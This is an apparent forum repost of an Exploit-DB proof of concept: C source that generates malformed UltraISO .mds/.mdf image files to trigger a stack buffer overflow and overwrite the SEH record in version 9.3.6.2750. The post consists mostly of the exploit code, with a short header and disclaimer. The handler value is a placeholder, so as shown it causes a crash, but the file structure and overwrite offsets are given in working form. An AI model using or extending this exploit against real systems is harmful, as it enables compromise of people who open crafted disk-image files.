Exploit UltraISO 9.3.6.2750 - '.mds' / '.mdf' Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14072
Проверка EDB
  1. Пройдено
Автор
FL0 FL0W
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2010-06-27
C:
/*
   DISCLAIMER
    
   THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!!
   The programs are provided as is without any guarantees or warranty.
   The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs.
   The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs.
    
   Author:           fl0 fl0w
   Software:         UltraISO 
   Dl link:          http://www.ezbsystems.com/ultraiso/download.htm
    
   Afected Versions: 9.3.6.2750
   Remote:           Yes
   Local:            Yes
   Class:            Boundary Condition Error
   Bug:              Stack buffer overflow
   Exploitable:      Yes 
   Afected software: Windows 7/2008/Vista/2003/XP (32bit and 64bit), Windows 2000, ME, 98SE, 98, or Windows NT4.0 SP6a 
   Fix:              No fix   
   Compiler:         gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125) 
   Advice:           To avoid any problems under Windows use cygwin console.
                     
   The .C code:
 */
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>

#define TITLE "-UltraISO .mds .mdf files buffer overflow exploit(new 0day)\n" \
              "-Author fl0 fl0w\n"
#define VER   "-Version 9.3.6.2750"
#define CHAR_SIZE 1
#define Write_mod "wb" 
#define MDS_FILE_NAME "20100622_123031.mds"
#define MDF_FILE_NAME "20100622_123031.mdf"
#define CHARS		    "0123456789ABCDEFGHIJKLMNOPQRST" \
                        "UVWXYZabcdefghijklmnopqrstuvwxyz"
#define MEM_ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)		
#define RND_STR_OFFSET 480				
#define RND_STR_SIZE 5000
#define MDS_FILE           "\x4d\x45\x44\x49\x41\x20\x44\x45\x53\x43\x52\x49\x50\x54\x4f\x52\x01\x03\x00\x00" \
		                   "\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
                           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x58\x00\x00\x00\x00\x00\x00\x00\x6a\xff\xff\xff\x19\x00\x00\x00\x01\x00\x04\x03" \
						   "\x01\x00\x01\x00\x00\x00\x00\x00\x70\x00\x00\x00\x00\x00\x14\x00\xa0\x00\x00\x00" \
						   "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
                           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
					       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\xa1\x00\x00\x00" \
						   "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\xa2\x00\x00\x00" \
						   "\x00\x00\x02\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\x00\x14\x00\x01\x00\x00\x00" \
					       "\x00\x00\x02\x00\xc8\x01\x00\x00\x30\x09\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x01\x00\x00\x00\xd0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
						   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00" \
						   "\x19\x00\x00\x00\xe0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
#define MDS_END			   "\x2a\x2e\x6d\x64\x66\x00"
#define SEH_HANDLER 944
#define NEXT_SEH    940
#define MDF_FILE  "\x66\x61\x6B\x65\x20\x6D\x64\x66\x20\x66\x69\x6C\x65\x20"
        typedef int i32;
        typedef char i8;
        typedef short i16;
    void error_handle();
	void gen_random (i8*, const int);
	void create_file(i8*,i8*);
	void copy_str(i8*,i8*,i32);
    i32 main(){
	   printf("%s%s",TITLE,VER);
	   create_file(MDS_FILE_NAME,MDF_FILE_NAME);
	   return 0;
	}
	void create_file(i8* Mdsname,i8* Mdfname){
	FILE* f=fopen(Mdsname,Write_mod);
	FILE* g=fopen(Mdfname,Write_mod);
	i8* buff=MEM_ALOC(i8,sizeof(MDS_FILE)+RND_STR_SIZE);
	i8* rnd_str_buff=MEM_ALOC(i8,RND_STR_SIZE);
	
	if(!buff)
	   error_handle();
	
	if(!rnd_str_buff)
	   error_handle();
	   
	gen_random(rnd_str_buff,RND_STR_SIZE);
	copy_str(buff,MDS_FILE,sizeof(MDS_FILE));
	copy_str(buff+RND_STR_OFFSET,rnd_str_buff,RND_STR_SIZE);
	copy_str(buff+NEXT_SEH,"\xeb\x04\x90\x90",4);
	copy_str(buff+SEH_HANDLER,"\x66\x66\x66\x66",4);
	
	if(!f) 
	  error_handle();
	
    fwrite(buff,CHAR_SIZE,sizeof(MDS_FILE)+RND_STR_SIZE,f); 
    fwrite(MDS_END,CHAR_SIZE,sizeof(MDS_END)-1,f); 	
	
	free(buff);
	free(rnd_str_buff);
	fclose(f);
	
	if(!g)
	   error_handle();
	   
	fwrite(MDF_FILE,CHAR_SIZE,sizeof(MDF_FILE)-1,g);   
	fclose(g);
	}
    void error_handle(void){
                   perror("\nError");
                   exit(1);
    }
	void gen_random (i8* s, const int len){ 
	    i32 i;
        for(i=0;i<len;++i){
        s[i]=CHARS[rand()%(sizeof(CHARS)-1)];
        }
       s[len]=0;
    }
    void copy_str(i8* v,i8* w,i32 len){
                   memcpy(v,w,len);
    }
 
Источник
www.exploit-db.com

Похожие темы